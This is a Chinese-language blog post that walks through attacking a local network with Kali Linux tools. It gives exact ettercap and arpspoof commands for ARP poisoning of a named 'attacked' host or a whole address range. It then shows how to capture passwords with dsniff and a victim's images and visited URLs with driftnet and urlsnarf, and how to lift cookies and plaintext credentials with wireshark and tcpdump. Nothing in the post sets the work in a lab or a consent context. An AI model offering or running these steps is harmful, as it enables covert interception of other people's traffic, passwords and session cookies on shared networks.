kalilinux內網嗅探,局域網監控記錄

快過年了沒事瞎玩玩,2017有空玩玩kali。前提需要鏈接到無線網

一、Ettercap(Etter [人名] 埃特cap[kæp] 蓋;帽子)是一款嗅探工具,包含ARP欺騙,DNS,劫持,中間人攻擊,嗅探密碼等功能

(ettercap經常報錯ERROR 12 Cannot allocate memory,不知道怎麼解決哪位大神指教一下,求教)

開啓轉發,重新開啓一個命令行:
echo "1">/proc/sys/net/ipv4/ip_forward

進入Kali Linux啓動Sniffing/Spoofing>Network Sniffers>Ettercap 或者命令行  ettercap -G  啓動圖形界面
ARP(Address Resolution Protocol)即地址解析協議是根據IP地址獲取物理地址的一個TCP/IP協議。
1、切換到Sniff標籤,點擊Unified sniffing…,選擇wlan0網絡接口,(wlan0 是無線接口eth0 是有線接口)
2、Host標籤,點擊Scan for hosts,很快,Ettercap就列出了所有該網絡下的C類地址,點擊192.168.1.102(被攻擊者IP)添加到Target 1,點擊192.168.1.1(網關地址)添加到Target 2
3、設置中間人,Mitm->arp poisoning...->Sniff remote connections打對勾 點擊確定
4、Start->Start sniffing 開始監聽
5、點view -- connections開始查看連接:

命令行方式

ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/
ettercap使用方法,參數詳解:
-P  使用插件
-T  使用基於文本界面
-q  啓動安靜模式(不回顯)
-M  啓動ARP欺騙攻擊
192.168.1.102/ 被攻擊的目標主機,第二個192.168.1.1網關ip

ettercap -i wlan0 -Tq -M arp:remote /192.168.1.100-253/ /192.168.1.1/
第一個/ / 中內容爲所欺騙的目標,第二個爲網關。 可寫//  //   裏面爲空,表示全部欺騙。

二、arpspoof 進行arp欺騙

必須另外開啓終端 echo  1>/proc/sys/net/ipv4/ip_forward 進行IP流量轉發,不然被攻擊者無法上網

命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102 

嗅探密碼:dsniff -i wlan0

三、driftnet (drift 英 [drɪft] n.漂移,偏移;趨勢) 是一款簡單的圖片捕獲工具;urlsnarf捕獲url鏈接 

再打開一個終端,輸入driftnet -i wlan0  彈出一個小方框等待獲取圖片

語法 : driftnet   [options]   [filter code]主要參數:

-b 捕獲到新的圖片時發出嘟嘟聲
-i  interface     選擇監聽接口
-f  file   讀取一個指定pcap數據包中的圖片
-p  不讓所監聽的接口使用混雜模式
-a  後臺模式:將捕獲的圖片保存到目錄中(不會顯示在屏幕上)
-m number 指定保存圖片數的數目
-d directory  指定保存圖片的路徑
-x prefix  指定保存圖片的前綴名
使用舉例:讀取一個指定pcap數據包中的圖片 driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/
再打開一個終端,輸入 urlsnarf -i wlan0 監聽瀏覽過的網頁日誌,等待獲取

五、 數據包捕獲工具

1、wireshark:命令行wireshark啓動,中間的Capture 選擇 wlan0 然後點擊 Start,獲取cookie以及沒有加密的明文密碼
2、tcpdump:可以將網絡中傳送的數據包完全截獲下來提供分析。支持針對網絡層、協議、主機、網絡或端口的過濾

命令行 tcpdump -i wlan0

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章